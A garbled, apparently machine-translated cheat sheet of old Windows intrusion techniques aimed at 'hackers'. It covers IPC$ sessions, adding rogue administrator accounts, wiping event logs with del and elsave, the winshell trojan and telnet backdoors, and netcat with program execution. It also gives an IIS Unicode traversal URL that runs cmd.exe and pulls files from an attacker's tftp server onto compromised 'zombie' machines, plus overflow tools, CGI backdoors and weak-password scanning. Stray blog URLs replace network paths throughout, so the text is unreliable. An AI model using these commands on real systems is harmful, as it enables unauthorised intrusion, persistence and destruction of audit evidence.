Basic commands that network administrators and hackers should know!

Network administrators and hackers should knowBasic command! Network Management and blackCommands that must be known to all users
Several common net commands:
(Empty with remote hostNet use http://www.cnblogs.com/lyglive/admin/file://ip/address bar ipipc$ ""/use :""
(Log On As an administratorRemote Host) net use http://www.cnblogs.com/lyglive/admin/file://ip/address] ipc$ "password"/use: "admiNistrator"
(Transfer a file to the remote masterMachine WINNT directory)Copy local directory path \ Program http://www.cnblogs.com/lyglive/admin/file://ip/address #admin$
(View remote host time) Net time http://www.cnblogs.com/lyglive/admin/file://ip/address
(Regularly start a program) At http://www.cnblogs.com/lyglive/admin/file://ip/address readme.exe 　　
(View share) Net view http://www.cnblogs.com/lyglive/admin/file://ip/address
(View netbioS working group list) nbtstat-a ip Address
(Disk C of the remote host is reflectedNet use F: http://www.cnblogs.com/lyglive/admin/file://ip/address symbol c$ ""/User:"DministratOr"
(Add yourself to these two items.To the Administrator group): Net user username and password/Add net localgroupAdministraTors username/Add

　
(Disconnect) net use http://www.cnblogs.com/lyglive/admin/file://ip/address \ipc$/delete
Scanning tail:
Del c: \ winnt \ sYstem32 \ LoGfiles \*.* 　
Del c: \ winnt \ sSytem32 \ CoNfig \ *. EVT 　　
Del c: \ winnt \ sYstem32 \ dtClog \*.*
Del c: \ winnt \ sYstem32 \*.Log
Del c: \ winnt \ sYstem32 \*.Txt
Del c: \ winnt \*. Txt
Del c: \ winnt \*. Log
I. netsvc. eXE
The following commands are as follows:List service items on a host, Search and remotely start the host"Time task" service:
Netsvc/list http://www.cnblogs.com/lyglive/admin/file://ip/address
Netsvc schedule http://www.cnblogs.com/lyglive/admin/file://ip/address/Query
Netsvc http://www.cnblogs.com/lyglive/admin/file://ip/address schedule/start
Ii. opentelnEt.exeElnet service, and bindSet port to 7878, for exampleFor example:
OpentelnEt http://www.cnblogs.com/lyglive/admin/file://ip/address username and password 1 7878
Then telneT to host 7878Port: Enter the DOS mode.: Telnet IP address 7878
Iii. winshell. Exe
A very small Trojan (NoTo 6 K), telneT to host 7878Port, enter the password winsHell, when you see cmD> after, you can lay down your lifeOrder:
PATH (view winshelL path information of the main program) 　　
Reboot (restart the machine)
Shutdown)
Shell (after execution, youYou will see the cute "C:\> ")
Exit (exit this logon session,This command does not terminate winShell Running)
CMD> http ://.../Srv.exe(Download it through HTTPFiles on the website are runningWinshell Machine)
Iv. 3389 login device,Log on to the remote master using GuiMachine
5. elsave. eXE
Event Log clearing tool 　　
Elsave-s http://www.cnblogs.com/lyglive/admin/file://ip/address-L "applicatiOn "-C
Elsave-s http://www.cnblogs.com/lyglive/admin/file://ip/address-L "System"-C
Elsave-s http://www.cnblogs.com/lyglive/admin/file://ip/address-l
"Security"-C is successfully cleared after executionApplication logs and system logs, Security Log
6. hbulot. eXE
Enable win2kseRver and WINXP3389 of services
Hbulot
[/R] indicates installation using/RAfter completion, the target is automatically restartedThe setting takes effect.
7、nc.exe (nEtcat.exe)
A good tool,Some script programs need to useIt can also be connected after Overflow.
To connect to a location:NC [-options]Hostname port [s] [ports]...
Bind port to wait for connection: NC-l-P port [-options][Hostname][Port]
Parameter:-e prog program redirection, once connected, Run [dangerous!]. -G
Gateway source-RouTing hop point [s], up to 8-G num source-RouTing pointer: 4, 8, 12,...-H help information

-I secs
Latency interval-l listening mode, used for inbound connectionIP address specified by-N,Hostnam cannot be usedE-o file records hexadecimal transmission-P

Port
Local port number-R: Specify the local and remote ports arbitrarilyPort-s ADDR local source address-u UDP mode-V detailed output-use two-V for more information

Detailed Content-W
Secs timeout time-Z: Turn off the input and output -- UseDuring Scanning
 
8. tftpd32.EXE
Temporarily put your computerChange to an FTP serverTo allow bots to download files,The tftp command must be run on the zombieRun on, usually use UNicode vulnerability or tElnet to broilers

For example:
Http: // ip/address/s cripts/... %255C .. % 255C/winnt/SYStem32/CMD. EXE? /C tftp-I local IP address get file name c: \ winnt \ sYstem32 \

File Name
Then you can directly dispatch the textRun: http: // ip/address/s cripts/.. %255C .. % 255C/winnt/SYStem32/CMD. EXE? /C + FileName

9. prihack.EXE is the PR of IISInter Remote BufferOverflow tool.
Idqover.EXE overflows idq., Select "overflow inPort listening ", and then use tMonitoring of elnet connectionListening port. If overflow succeeds, And its port,

The bound command is executed immediately.Xploit.exeIs the ID of a graphical interfaceA overflows. After successful wiWin in NXPXP.

○ NTIS. ExE‑cmd.exe andCmdasp. aspThree CGI-bacKdoor, EXEPut it in cgi-bin.Directory, put ASP inDirectory of the SP execution permission.Then use IE

Browser connection.
1. Run the xscan command lineParameter description:
During the detection process"[Space]" key can be queriedView the status of each thread and scan itDegree, press the "Q" key to saveExit the program before data, Press "" to forcibly close the program.

1. Command Format:
Xscan-host <start ip> [-<EndIP stop>] <check item> [other options] xscan-file

The <check item> includesThe meaning is as follows:
-Port: Port of Common ServicesStatus (you can use \ dat \Config. iniThe "PORT-S of the fileCan-OptionS \ PORT-LIST "item custom port to be detectedList)

;
-FTP: detects weak FTP passwords (YesUse \ dat \ conFig. INI File SettingsUsername/password dictionary-Ntpass:
Detect NT-ServWeak er password (can be passed \Dat \ configSet the user in the. ini fileName/password dictionary file );-CGI:
Detects CGI vulnerabilities (optionalUse \ dat \ conFig. ini fileCGI-ENCODE \ encode_tYpe "item sets the encoding partyCase);-IIS:
Detect IIS vulnerabilities (optionalUse \ dat \ conFig. ini fileCGI-ENCODE \ encode_tYpe "item sets the encoding partyCase); [Other Options] meanings are as follows:

-V: displays the detailed scan progress.
-P: Skip the master that cannot be pingedMachine
-O: Skip the steps where no open end is detectedPort host
-T <number of concurrent threads [, andNumber of sending hosts]>:
Maximum number of concurrent threadsQuantity and number of concurrent hosts. The default quantity is, 10